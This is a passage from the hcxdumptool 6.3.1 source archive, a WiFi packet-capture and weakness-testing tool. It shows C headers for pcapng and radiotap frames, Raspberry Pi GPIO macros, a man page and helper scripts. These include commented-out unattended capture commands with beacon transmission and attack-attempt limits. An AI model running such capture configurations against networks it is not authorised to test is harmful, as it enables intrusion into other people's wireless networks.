interface the packet was captured from - identified by interface description block in current section */ u32 timestamp_high; /* high bytes of timestamp */ u32 timestamp_low; /* low bytes of timestamp */ u32 cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */ u32 org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ }enhanced_packet_block_t; #define EPB_SIZE (sizeof(enhanced_packet_block_t)) /*===========================================================================*/ static const u8 hcxmagic[] = { 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 }; #define HCXMAGIC_SIZE (sizeof(hcxmagic)) /*===========================================================================*/ hcxdumptool-6.3.1/include/radiotap.h000066400000000000000000000053111444752163100174750ustar00rootroot00000000000000/*===========================================================================*/ #define DLT_IEEE802_11_RADIO 127 /*===========================================================================*/ enum ieee80211_radiotap_presence { IEEE80211_RADIOTAP_TSFT = 0x00000001, IEEE80211_RADIOTAP_FLAGS = 0x00000002, IEEE80211_RADIOTAP_RATE = 0x00000004, IEEE80211_RADIOTAP_CHANNEL = 0x00000008, IEEE80211_RADIOTAP_FHSS = 0x00000010, IEEE80211_RADIOTAP_DBM_ANTSIGNAL = 0x00000020, IEEE80211_RADIOTAP_DBM_ANTNOISE = 0x00000040, IEEE80211_RADIOTAP_LOCK_QUALITY = 0x00000080, IEEE80211_RADIOTAP_TX_ATTENUATION = 0x00000100, IEEE80211_RADIOTAP_DB_TX_ATTENUATION = 0x00000200, IEEE80211_RADIOTAP_DBM_TX_POWER = 0x00000400, IEEE80211_RADIOTAP_ANTENNA = 0x00000800, IEEE80211_RADIOTAP_DB_ANTSIGNAL = 0x00001000, IEEE80211_RADIOTAP_DB_ANTNOISE = 0x00002000, IEEE80211_RADIOTAP_RX_FLAGS = 0x00004000, IEEE80211_RADIOTAP_TX_FLAGS = 0x00008000, IEEE80211_RADIOTAP_RTS_RETRIES = 0x00010000, IEEE80211_RADIOTAP_DATA_RETRIES = 0x00020000, /* 18 is XChannel, not defined */ IEEE80211_RADIOTAP_MCS = 0x00080000, IEEE80211_RADIOTAP_AMPDU_STATUS = 0x00100000, IEEE80211_RADIOTAP_VHT = 0x00200000, IEEE80211_RADIOTAP_TIMESTAMP = 0x00400000, /* valid in every it_present bitmap, even vendor namespaces */ IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE = 0x20000000, IEEE80211_RADIOTAP_VENDOR_NAMESPACE = 0x40000000, IEEE80211_RADIOTAP_EXT = 0x80000000, }; /*---------------------------------------------------------------------------*/ enum ieee80211_radiotap_flags { IEEE80211_RADIOTAP_F_CFP = 0x01, IEEE80211_RADIOTAP_F_SHORTPRE = 0x02, IEEE80211_RADIOTAP_F_WEP = 0x04, IEEE80211_RADIOTAP_F_FRAG = 0x08, IEEE80211_RADIOTAP_F_FCS = 0x10, IEEE80211_RADIOTAP_F_DATAPAD = 0x20, IEEE80211_RADIOTAP_F_BADFCS = 0x40, }; /*===========================================================================*/ typedef struct __attribute__((__packed__)) { u8 it_version; u8 it_pad; u16 it_len; u32 it_present; }rth_t; #define RTHRX_SIZE (ssize_t)(sizeof(rth_t)) /*---------------------------------------------------------------------------*/ static const u8 rthtxdata[] = { 0x00, 0x00, /* radiotap version and padding */ 0x08, 0x00, /* radiotap header length */ 0x00, 0x00, 0x00, 0x00, /* bitmap */ }; #define RTHTX_SIZE sizeof(rthtxdata) /*---------------------------------------------------------------------------*/ static const u8 rthtxnoackdata[] = { 0x00, 0x00, /* radiotap version and padding */ 0x0a, 0x00, /* radiotap header length */ 0x00, 0x80, 0x00, 0x00, /* bitmap */ 0x18, 0x00 /* tx flags */ }; #define RTHTXNOACK_SIZE sizeof(rthtxnoackdata) /*===========================================================================*/ hcxdumptool-6.3.1/include/raspberry.h000066400000000000000000000011461444752163100177050ustar00rootroot00000000000000/*===========================================================================*/ #define RPINAME_SIZE 12 #define RASPBERRY_INFO 2048 #define GPIO_LED_DELAY 100000000L #define RPI_BLOCK_SIZE (4*1024) #define INP_GPIO(g) *(gpio +((g) /10)) &= ~(7 << (((g) %10) *3)) #define OUT_GPIO(g) *(gpio +((g) /10)) |= (1 << (((g) %10) *3)) #define GPIO_SET *(gpio +7) #define GPIO_CLR *(gpio +10) #define GET_GPIO(g) (*(gpio +13) & (1 << g)) static void *gpio_map; static volatile unsigned *gpio; static const char rpiname[] = "Raspberry Pi"; /*===========================================================================*/ hcxdumptool-6.3.1/include/types.h000066400000000000000000000007621444752163100170430ustar00rootroot00000000000000/*===========================================================================*/ typedef uint8_t u8; typedef uint16_t u16; typedef uint32_t u32; typedef uint64_t u64; typedef int8_t s8; typedef int16_t s16; typedef int32_t s32; typedef int64_t s64; typedef u16 __bitwise be16; typedef u16 __bitwise le16; typedef u32 __bitwise be32; typedef u32 __bitwise le32; typedef u64 __bitwise be64; typedef u64 __bitwise le64; /*===========================================================================*/ hcxdumptool-6.3.1/jni/000077500000000000000000000000001444752163100146565ustar00rootroot00000000000000hcxdumptool-6.3.1/jni/Application.mk000066400000000000000000000000731444752163100174520ustar00rootroot00000000000000APP_PLATFORM := android-21 APP_BUILD_SCRIPT := Android.mk hcxdumptool-6.3.1/license.txt000066400000000000000000000020711444752163100162610ustar00rootroot00000000000000The MIT License (MIT) Copyright (c) 2000-2023 ZeroBeat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. hcxdumptool-6.3.1/man/000077500000000000000000000000001444752163100146515ustar00rootroot00000000000000hcxdumptool-6.3.1/man/hcxdumptool.1000066400000000000000000000013401444752163100172770ustar00rootroot00000000000000.\" Manpage for hcxdumptool. .\" Contact https://github.com/ZerBea to correct errors or typos. .TH man 1 "23 October 2021" "1.0" "hcxdumptool man page" .SH NAME hcxtools .SH DESCRIPTION Small tool to capture packets from wlan devices and to detect weak points within own WiFi networks. .SH TOOLS .nf | hcxdumptool | Tool to run several tests to determine if ACCESS POINTs or CLIENTs are vulnerable | .SH OPTIONS help menu (-h or --help) of each tool will list all available options .SH RELATED TOOLS hcxpcapngtool, hcxhashtool, hcxpsktool, hcxpmktool, hcxeiutool, hcxwltool, hcxhash2cap, whoismac, wlancap2wpasec, wlangenpmk, wlangenpmkocl .SH BUGS no known bugs. .SH AUTHOR ZeroBeat (https://github.com/ZerBea) hcxdumptool-6.3.1/usefulscripts/000077500000000000000000000000001444752163100170115ustar00rootroot00000000000000hcxdumptool-6.3.1/usefulscripts/bash_profile000077500000000000000000000034161444752163100214000ustar00rootroot00000000000000#!/bin/bash sleep 10 chmod 777 -R /home cd /home iw reg set IN #hcxdumptool --gpio_button=4 --gpio_statusled=17 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --onwatchdog=reboot --bpf=own.bpfc --essidlist=standard.essidlist --beacontx=5 #hcxdumptool --gpio_button=4 --gpio_statusled=17 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --onwatchdog=reboot --bpf=own.bpfc --essidlist=standard.essidlist --beacontx=5 -c 1a,6a,11a,2a,1a,6a,11a,13a,1a,6a,11a,3a,1a,6a,11a,12a,1a,6a,11a,4a,1a,6a,11a,10a,1a,6a,11a,5a,1a,6a,11a,9a,1a,6a,11a,7a,1a,6a,11a,8a #hcxdumptool --gpio_button=4 --gpio_statusled=17 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --onwatchdog=reboot --bpf=own.bpfc --essidlist=standard.essidlist --beacontx=5 -c 1a,6a,11a,2a,1a,6a,11a,13a,1a,6a,11a,3a,1a,6a,11a,12a,1a,6a,11a,4a,1a,6a,11a,10a,1a,6a,11a,5a,1a,6a,11a,9a,1a,6a,11a,7a,1a,6a,11a,8a,1a,6a,11a,36b,1a,6a,11a,40b,1a,6a,11a,44b,1a,6a,11a,48b #hcxdumptool --gpio_button=4 --gpio_statusled=17 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --onwatchdog=reboot --bpf=own.bpfc --essidlist=standard.essidlist --tot=8640 --attemptclientmax=2 --beacontx=5 -t 120 -c 1a,8a,3a,6a,4a,7a,2a,5a --disable_deauthentication --disable_proberequest --disable_association --disable_reassociation #hcxdumptool --gpio_button=4 --gpio_statusled=17 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --onwatchdog=reboot --bpf=own.bpfc --essidlist=standard.essidlist --attemptapmax=1000 --attemptclientmax=20 --beacontx=5 -c 1a,6a,11a,2a,1a,6a,11a,13a,1a,6a,11a,3a,1a,6a,11a,12a,1a,6a,11a,4a,1a,6a,11a,10a,1a,6a,11a,5a,1a,6a,11a,9a,1a,6a,11a,7a,1a,6a,11a,8a systemctl start dhcpcd.service systemctl start ssh.service #poweroff hcxdumptool-6.3.1/usefulscripts/pireadcard000077500000000000000000000013441444752163100210370ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nplease select SD-card: " read DEVICE sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 if [ -f "RASPIFIRM.tgz" ] then rm -f RASPIFIRM.tgz fi if [ -f "RASPIROOT.tgz" ] then rm -f RASPIROOT.tgz fi echo "mount RASPIFIRM" if [ ! -d "RASPIFIRM" ] then mkdir RASPIFIRM fi sudo mount /dev/"$DEVICE"1 RASPIFIRM cd RASPIFIRM sudo tar -zcvf ../RASPIFIRM.tgz . sync cd .. echo "mount RASPIROOT" if [ ! -d "RASPIROOT" ] then mkdir RASPIROOT fi sudo mount /dev/"$DEVICE"2 RASPIROOT cd RASPIROOT sudo tar --exclude=var/log --exclude=lost+found -zcvpf ../RASPIROOT.tgz . sync cd .. sudo umount RASPIFIRM sudo umount RASPIROOT rm -r RASPIFIRM rm -r RASPIROOT sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 hcxdumptool-6.3.1/usefulscripts/piwritecard000077500000000000000000000016141444752163100212560ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nplease select SD-card: " read DEVICE sudo parted /dev/$DEVICE --script -- mklabel msdos sudo parted /dev/$DEVICE --script -- mkpart primary fat32 1 512 sudo parted /dev/$DEVICE --script -- mkpart primary 512 100% sudo parted /dev/$DEVICE --script -- set 1 boot on sudo mkfs.vfat /dev/"$DEVICE"1 sudo mlabel -i /dev/"$DEVICE"1 -s ::RASPIFIRM sudo mkfs.ext4 -F /dev/"$DEVICE"2 sudo e2label /dev/"$DEVICE"2 RASPIROOT echo "mount RASPIFIRM" if [ ! -d "RASPIFIRM" ] then mkdir RASPIFIRM fi sudo mount /dev/"$DEVICE"1 RASPIFIRM cd RASPIFIRM sudo tar -zxvf ../RASPIFIRM.tgz sync cd .. echo "mount RASPIROOT" if [ ! -d "RASPIROOT" ] then mkdir RASPIROOT fi sudo mount /dev/"$DEVICE"2 RASPIROOT cd RASPIROOT sudo tar -zxvf ../RASPIROOT.tgz sync cd .. sudo umount RASPIFIRM sudo umount RASPIROOT rm -r RASPIFIRM rm -r RASPIROOT sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 hcxdumptool-6.3.1/usefulscripts/startnlmon000077500000000000000000000001601444752163100211350ustar00rootroot00000000000000#!/bin/sh echo "Activating NETLINK monitor" sudo ip link add nlmon0 type nlmon sudo ip link set dev nlmon0 up hcxdumptool-6.3.1/usefulscripts/startnm000077500000000000000000000002041444752163100204230ustar00rootroot00000000000000#!/bin/sh echo "Activating NetworkManager" sudo systemctl start NetworkManager.service sudo systemctl start wpa_supplicant.service hcxdumptool-6.3.1/usefulscripts/stopnm000077500000000000000000000002041444752163100202530ustar00rootroot00000000000000#!/bin/sh echo "Deactivating NetworkManager" sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service